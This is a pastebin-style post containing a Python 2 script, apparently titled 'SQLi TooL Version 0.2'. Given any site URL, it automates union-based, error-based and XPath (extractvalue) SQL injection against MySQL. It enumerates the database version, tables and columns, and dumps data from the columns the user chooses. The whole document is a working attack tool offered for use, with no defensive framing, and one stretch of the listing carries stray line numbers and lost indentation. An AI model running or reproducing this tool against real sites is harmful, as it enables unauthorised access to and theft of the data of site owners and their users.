SQL Injection


SUBMITTED BY: Guest

DATE: May 19, 2013, 1:32 a.m.

FORMAT: Python

SIZE: 23.4 kB

HITS: 2291

from bs4 import BeautifulSoup
# Python 2 script: uses raw_input, urllib.urlopen and str.encode('hex').
import urllib, urllib2, re, webbrowser, sys, os, time, string
class App(object):

    def Clean(self):
        # Clear the terminal; sys.platform is 'linux2' on Python 2, so default to 'clear'.
        clear = 'cls' if sys.platform == 'win32' else 'clear'
        os.system(clear)
    def Routine(self):
        print("Enter the site:")
        global site
        site = raw_input(">>> ")
        if site == 'exit':
            sys.exit()
        # Basic sanity checks on the target URL.
        while 'www' not in site and 'http://' not in site and '.' not in site:
            print("[!] Please enter a valid site!")
            site = raw_input(">>> ")
            print("[=============================]")
        while site.isdigit():
            print("[!] You entered an integer. Please enter the site.")
            site = raw_input(">>> ")
            print("[===============================================]")
        if site[:4] != "http":
            site = "http://" + str(site)
        if '=' in site:
            site = site.replace("=", "=-")
        if site.endswith("/*"):
            site = site.rstrip('/*')
        if site.endswith("#"):
            site = site.rstrip("#")
    def UnionBased(self):
        print("")
        print(" [Union Based]")
        print("---------------")
        self.Routine()
        print(" [!] Getting column count...")
        print("")
        global site
        site = site.replace('=-', '=')
        # Increase the ORDER BY index until the response contains an SQL error.
        for i in range(2, 30):
            url = site + '+order+by+%s--' % (i)
            URL = urllib.urlopen(url)
            Html = URL.read()
            soup = BeautifulSoup("".join(Html))
            bsoup = soup.findAll('', text=True)
            bsoup = str(bsoup)
            bsoup = re.sub('<[^<]+?>', '', bsoup)
            search = re.search("You have an error", bsoup)
            search2 = re.search("Unknown column", bsoup)
            search3 = re.search("Error", bsoup)
            search4 = re.search("SQL", bsoup)
            if search is None and search2 is None and search3 is None and search4 is None:
                pass
            else:
                I = i - 1
                print("Column count is: " + str(I))
                break
        site = site.replace('=', '=-')
        print("[==================]")
        print(" [!] Getting vulnerable columns...")
        ColumnS = ','.join([str(y) for y in range(1, i)])
        url = site + '+union+select+%s--' % (ColumnS)
        URL = urllib.urlopen(url)
        Html = URL.read()
        vul = re.findall(r'<[^<]+?>\d+<[^<]+?>', Html)
        vul = str(vul)
        vul = re.sub('<.*?>', "", vul)
        vul = re.sub("'", "", vul)
        vul = re.sub('"', "", vul)
        vul = vul.strip('[')
        vul = vul.strip(']')
        print("[====================]")
        print("Vulnerable Columns: " + vul)
        print("")
        print("Select vulnerable column to test for db version:")
        ColumnS = ColumnS.replace(raw_input(">>> "), '@@version')
        if ColumnS == '-n' or ColumnS == 'n':
            new = 2
            webbrowser.open(url, new=new)
        url = site + '+union+select+%s--' % (ColumnS)
        URL = urllib.urlopen(url)
        Html = URL.read()
        search = re.findall('5.0', Html)
        search2 = re.findall('4.0.', Html)
        search3 = re.findall('5.1.', Html)
        db = '5.0'
        db2 = '4.0'
        db3 = '5.1.'
        if db in search:
            print("DB Server: MySQL >=5")
        if db2 in search2:
            print("DB Server: MySQL >=4")
        if db3 in search3:
            print("DB Server: MySQL >=5.1")
  101. print("")
  102. print(" [!] Getting Tables...")
  103. url = url.rstrip('--')
  104. URL = url.replace("@@version","group_concat(table_name,0x0a)") + '+from+information_schema.tables+where+table_schema=database()--'
  105. REQ = urllib.urlopen(URL)
  106. Html = REQ.read()
  107. tblSearch = re.findall("(\w+\s*,\s*\w+\s*(?:,\s*\w+\s*)*)", Html)
  108. tblSearch = str(tblSearch)
  109. tblSearch = re.sub('<.*?>',"", tblSearch)
  110. tblSearch = re.sub('<[^<]+?>', '', tblSearch)
  111. tblSearch = re.sub('<[^>]*>', '', tblSearch)
  112. tblSearch = re.sub(r'\\n', '', tblSearch)
  113. tblSearch = re.sub("'", "", tblSearch)
  114. tblSearch = re.sub('\\\\', '', tblSearch)
  115. tblSearch = tblSearch.strip('[')
  116. tblSearch = tblSearch.strip(']')
  117. print("[====================]")
  118. print("Tables Found: " + tblSearch)
  119. print("")
  120. print("Enter the table to inject")
  121. Tbl = raw_input('>>> ')
  122. if Tbl == '-n' or Tbl == 'n':
  123. print("")
  124. print(" [!] Redirecting in browser...")
  125. print("[============================]")
  126. new = 2
  127. url = URL
  128. webbrowser.open(url,new=new)
  129. while Tbl == int():
  130. print("[===========================================================]")
  131. print("[!] Please enter a string [or press n to redirect in browser]!")
  132. Tbl = raw_input(">>> ")
        Encoded = ','.join(str(ord(c)) for c in Tbl)
        URL = url.rstrip('--')
        URL = url.replace("@@version", "group_concat(column_name,0x0a)") + '+from+information_schema.columns+where+table_name=char(%s)--' % (Encoded)
        REQ = urllib.urlopen(URL)
        Html = REQ.read()
        colSearch = re.findall("(\w+\s*,\s*\w+\s*(?:,\s*\w+\s*)*)", Html)
        colSearch = str(colSearch)
        colSearch = re.sub('<.*?>', "", colSearch)
        colSearch = re.sub('<[^<]+?>', '', colSearch)
        colSearch = re.sub('<[^>]*>', '', colSearch)
        colSearch = re.sub(r'\\n', '', colSearch)
        colSearch = re.sub("'", "", colSearch)
        colSearch = re.sub('\\\\', '', colSearch)
        print("[====================]")
        print("Columns Found: " + colSearch)
        print("")
        print("Enter the columns to inject")
        Col1 = raw_input('Col #1 >>> ')
        Col2 = raw_input('Col #2 >>> ')
        if Col1 == '-n' or Col1 == 'n' or Col2 == '-n' or Col2 == 'n':
            print("")
            print("[!] Redirecting in browser...")
            print("[===========================]")
            new = 2
            url = URL
            webbrowser.open(url, new=new)
        print("[===============================]")
        print(" [!] Getting data from columns...")
        URL = url.rstrip('--')
        URL = url.replace('@@version', 'group_concat(%s,0x7e,%s)') % (Col1, Col2)
        URL = URL + '+from+%s--' % (Tbl)
        print(URL)
        REQ = urllib.urlopen(URL)
        Html = REQ.read()
        DataSearch = re.findall("(.*?)~(.*?),(.*?)", Html)
        DataSearch = str(DataSearch)
        DataSearch = re.sub('<.*?>', "", DataSearch)
        DataSearch = re.sub('<[^<]+?>', '', DataSearch)
        DataSearch = re.sub('<[^>]*>', '', DataSearch)
        DataSearch = re.sub(r'\\n', '', DataSearch)
        DataSearch = re.sub("'", "", DataSearch)
        DataSearch = re.sub('\\\\', '', DataSearch)
        if DataSearch == '[]':
            DataSearch = re.findall("(.*?)~(.*)", Html)
        print("[====================]")
        print("Data Found(%s,%s): " % (Col1, Col2) + str(DataSearch))
        print("[===================]")
        print("No more Data to dump!")
        print("[===================]")
        print("Hit ENTER to restart. \n'n' to redirect in browser for data search. \n'exit' to exit.")
        end = raw_input(">>> ")
        if end == '-n' or end == 'n':
            new = 2
            url = URL
            webbrowser.open(url, new=new)
        elif end == 'exit':
            sys.exit()
        else:
            run = App()
            run.Clean()
            run.main()
    def ErrorBased(self):
        print("")
        print(" [Error Based] ")
        print("---------------")
        self.Routine()
        print("[!] Trying Error Based Method...")
        global site
        site = site.replace("=-", "=")
        url = site + '+or+1+group+by+concat_ws(0x7e,version(),floor(rand(0)*2))+having+min(0)+or+1--'
        URL = urllib.urlopen(url)
        Html = URL.read()
        soup = BeautifulSoup("".join(Html))
        bsoup = soup.findAll('', text=True)
        bsoup = str(bsoup)
        bsoup = re.sub('<[^<]+?>', '', bsoup)
        searching = re.search("Duplicate entry '5.1", bsoup)
        searching2 = re.search("Duplicate entry '5", bsoup)
        if searching is None and searching2 is None:
            print("DB Server: MySQL >=4")
        elif searching is None:
            print("DB Server: MySQL >=5")
        else:
            print("DB Server: MySQL >=5.1")
        url = site + '+and+(select+1+from+(select+count(*),concat((select(select+concat(cast(database()+as+char),0x7e))+from+information_schema.tables+where+table_schema=database()+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)'
        URL = urllib.urlopen(url)
        Html = URL.read()
        m = re.compile("'(.*?)~1'").search(Html)
        soup = BeautifulSoup("".join(Html))
        bsoup = soup.findAll('', text=True)
        bsoup = str(bsoup)
        bsoup = re.sub('<[^<]+?>', '', bsoup)
        find = re.findall("'([^']*)'", bsoup)
        find = str(find)
        find = re.sub("'", "", find)
        find = re.sub("~1", "", find)
        find = re.sub(",", "", find)
        dbname = str(find)
        dbname = dbname.strip('[')
        dbname = dbname.strip(']')
        try:
            mgr = m.group(1)
        except AttributeError:
            print("")
            print("Website does not seem to be vulnerable to the Error Based method!")
            print("Restarting in 5...")
            time.sleep(5)
            run = App()
            run.Clean()
            run.main()
        print("")
        print("DB Name: " + m.group(1))
        print("")
        print(" [!] Getting tables from DB...")
        for i in range(0, 71):
            url = site + '+and+(select+1+from+(select+count(*),concat((select(select+concat(cast(table_name+as+char),0x7e))+from+information_schema.tables+where+table_schema=database()+limit+%s,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)' % (i)
            URL = urllib.urlopen(url)
            Html = URL.read()
            s = re.compile("'(.*?)~1'").search(Html)
            Html = re.sub('~1', '', Html)
            soup = BeautifulSoup("".join(Html))
            bsoup = soup.findAll('', text=True)
            bsoup = str(bsoup)
            bsoup = re.sub('<[^<]+?>', '', bsoup)
            find = re.findall("'([^']*)'", bsoup)
            find = list(find)
            Find = str(find[-1])
            if Find == '\n' or Find == '\\n' or Find == ', u':
                print("[============================]")
                print(" [!] There are no more tables to find!")
                break
            print("[============================]")
            print("Found table: " + s.group(1))
        print("[=======================]")
        print("Enter the table to inject")
        tbl = raw_input(">>> ")
        Tbl = tbl.encode('hex')
        for i in range(0, 23):
            url = site + '+and+(select+1+from+(select+count(*),concat((select(select+concat(cast(column_name+as+char),0x7e))+from+information_schema.columns+where+table_name=0x%s+limit+%s,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)' % (Tbl, i)
            URL = urllib.urlopen(url)
            Html = URL.read()
            s = re.compile("'(.*?)~1'").search(Html)
            Html = re.sub('~1', '', Html)
            soup = BeautifulSoup("".join(Html))
            bsoup = soup.findAll('', text=True)
            bsoup = str(bsoup)
            bsoup = re.sub('<[^<]+?>', '', bsoup)
            find = re.findall("'([^']*)'", bsoup)
            find = list(find)
            Find = str(find[-1])
            if Find == '\n' or Find == '\\n' or Find == ', u':
                print("[============================]")
                print(" [!] There are no more columns to find!")
                break
            print("[============================]")
            print("Found column: " + s.group(1))
        print("[============================]")
        print("Enter the columns to inject")
        col1 = raw_input("Col #1 >>> ")
        col2 = raw_input("Col #2 >>> ")
        dbname = dbname.strip('[')
        dbname = dbname.strip(']')
        for i in range(0, 23):
            url = site + '+and(select+1+from(select+count(*),concat((select+(select(SELECT+concat(0x7e,0x27,cast(%s.%s+as+char),0x27,0x7e)+FROM+`%s`.%s+LIMIT+%s,1)+)+from+information_schema.tables+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)+and+1=1' % (tbl, col1, mgr, tbl, i)
            URL = urllib.urlopen(url)
            Html = URL.read()
            m = re.compile("'(.*?)'~1'").search(Html)
            Html = re.sub('~1', '', Html)
            soup = BeautifulSoup("".join(Html))
            bsoup = soup.findAll('', text=True)
            bsoup = str(bsoup)
            bsoup = re.sub('<[^<]+?>', '', bsoup)
            find = re.findall("'([^']*)'", bsoup)
            find = list(find)
            Find = str(find[-1])
            if Find == '\n' or Find == '\\n' or Find == ', u':
                print("[============================]")
                print(" [!] There is no more data to dump from %s!" % col1)
                break
            print("[============================]")
            print("Data from %s: " % col1 + m.group(0))
        for i in range(0, 23):
            url = site + '+and(select+1+from(select+count(*),concat((select+(select(SELECT+concat(0x7e,0x27,cast(%s.%s+as+char),0x27,0x7e)+FROM+`%s`.%s+LIMIT+%s,1)+)+from+information_schema.tables+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)+and+1=1' % (tbl, col2, mgr, tbl, i)
            URL = urllib.urlopen(url)
            Html = URL.read()
            s = re.compile("'(.*?)'~1'").search(Html)
            Html = re.sub('~1', '', Html)
            soup = BeautifulSoup("".join(Html))
            bsoup = soup.findAll('', text=True)
            bsoup = str(bsoup)
            bsoup = re.sub('<[^<]+?>', '', bsoup)
            find = re.findall("'([^']*)'", bsoup)
            find = list(find)
            Find = str(find[-1])
            if Find == '\n' or Find == '\\n' or Find == ', u':
                print("[============================]")
                print(" [!] There is no more data to dump from %s!" % col2)
                break
            print("[============================]")
            print("Data from %s: " % col2 + s.group(0))
        print("No more Data to dump!")
        print("[===================]")
        print("Hit ENTER to restart.\n'exit' to exit.")
        end = raw_input(">>> ")
        if end == 'exit':
            sys.exit()
        else:
            run = App()
            run.Clean()
            run.main()
    def Xpath(self):
        print("")
        print(" [XPath Injection] ")
        print("-------------------")
        self.Routine()
        global site
        site = site.replace("=-", "=")
        url = site + '+and+extractvalue(rand(),concat(0x7e,version()))--'
        URL = urllib.urlopen(url)
        Html = URL.read()
        soup = BeautifulSoup("".join(Html))
        bsoup = soup.findAll('', text=True)
        bsoup = str(bsoup)
        bsoup = re.sub('<[^<]+?>', '', bsoup)
        searching = re.search("XPATH syntax", bsoup)
        if searching is None:
            print(" [!] Website does not seem to be vulnerable to XPath!")
            print(" [!] Restarting in 5...")
            time.sleep(5)
            run = App()
            run.Clean()
            run.main()
        else:
            print("DB Server: MySQL >=5.1")
            print("[=====================]")
        for i in range(0, 71):
            url = site + '+and+extractvalue(rand(),concat(0x0a,(select+concat(0x3a,table_name)+from+information_schema.tables+WHERE+table_schema=database()+limit+%s,1)))--' % (i)
            URL = urllib.urlopen(url)
            Html = URL.read()
            m = re.compile(":\s'\n:(.*?)'").search(Html)
            Html = re.sub('~', '', Html)
            search = re.search('You have an', Html)
            search2 = re.search('XPATH', Html)
            if search is not None or search2 is None:
                print("")
                print(" [!] There are no more tables to find!")
                print("[====================================]")
                break
            print("Found table: " + m.group(1))
        print("[=========================]")
        print("Enter the table to inject ")
        tbl = raw_input(">>> ")
        Tbl = tbl.encode('hex')
        for i in range(0, 23):
            url = site + '+and+extractvalue(rand(),concat(0x0a,(select+concat(0x3a,column_name)+from+information_schema.columns+where+table_name=0x%s+limit+%s,1)))--+x' % (Tbl, i)
            URL = urllib.urlopen(url)
            Html = URL.read()
            m = re.compile(":\s'\n:(.*?)'").search(Html)
            Html = re.sub('~', '', Html)
            search = re.search('You have an', Html)
            search2 = re.search('XPATH', Html)
            if search is not None or search2 is None:
                print("")
                print(" [!] There are no more columns to find!")
                print("[=====================================]")
                break
            print("Found column: " + m.group(1))
        print("[==========================]")
        print("Enter the columns to inject ")
        Col1 = raw_input("Col #1>>> ")
        Col2 = raw_input("Col #2>>> ")
        for i in range(0, 23):
            url = site + '+and+extractvalue(rand(),concat(0x3a,(select+concat(%s,0x3a,%s)+from+%s+limit+%s,1)))--+x' % (Col1, Col2, tbl, i)
            URL = urllib.urlopen(url)
            Html = URL.read()
            m = re.compile(":\s':(.*?):(.*?)'").search(Html)
            search = re.search('You have an', Html)
            search2 = re.search('XPATH', Html)
            if search is not None or search2 is None:
                print("")
                print(" [!] There is no more data to dump!")
                print("[=================================]")
                break
            print("[-----------%s:%s------------]" % (Col1, Col2))
            print("Found Data: " + m.group())
        print("[==========================]")
        print("No more Data to dump!")
        print("[===================]")
        print("Hit ENTER to restart.\n'exit' to exit.")
        end = raw_input(">>> ")
        if end == 'exit':
            sys.exit()
        else:
            run = App()
            run.Clean()
            run.main()
    def main(self):
        self.Clean()
        print(" +========================+ ")
        print(" | SQLi TooL Version 0.2  | ")
        print(" |      Help : -help      | ")
        print(" |    Coded by : 5K0N4    | ")
        print(" +========================+ ")
        print(" +========================+ ")
        print(" |_____Choose Method______| ")
        print(" |-----[1]Union Based-----| ")
        print(" |---[2]XPath Injection---| ")
        print(" |-----[3]Error Based-----| ")
        print(" +========================+ ")
        choice = raw_input(">>> ")
        while choice != '1' and choice != '2' and choice != '3' and choice != '-h' and choice != '-help' and choice != 'exit':
            print("Please enter a valid option [-h for help]!")
            choice = raw_input(">>> ")
        if choice == 'exit':
            sys.exit()
        elif choice == '-help' or choice == '-h':
            print("=======================")
            print("Union Based: ")
            print("")
            print("If the program didn't find anything useful you can \npress '-n' or 'n' to redirect in browser to search manually!")
            print("[---------------------------------------------------------]")
            print("Also there's a bug in 'Tables Found:', 'Columns Found:' and 'Data Found:' - \nbeware that some of those won't be valid tables\\columns but HTML elements!")
            print("[------------------------------------------------------------------------]")
            print("Hit ENTER to restart")
            restart = raw_input(">>> ")
            run = App()
            run.main()
        if choice == '1':
            self.Clean()
            self.UnionBased()
        elif choice == '2':
            self.Clean()
            self.Xpath()
        elif choice == '3':
            self.Clean()
            self.ErrorBased()


if __name__ == '__main__':
    run = App()
    run.main()
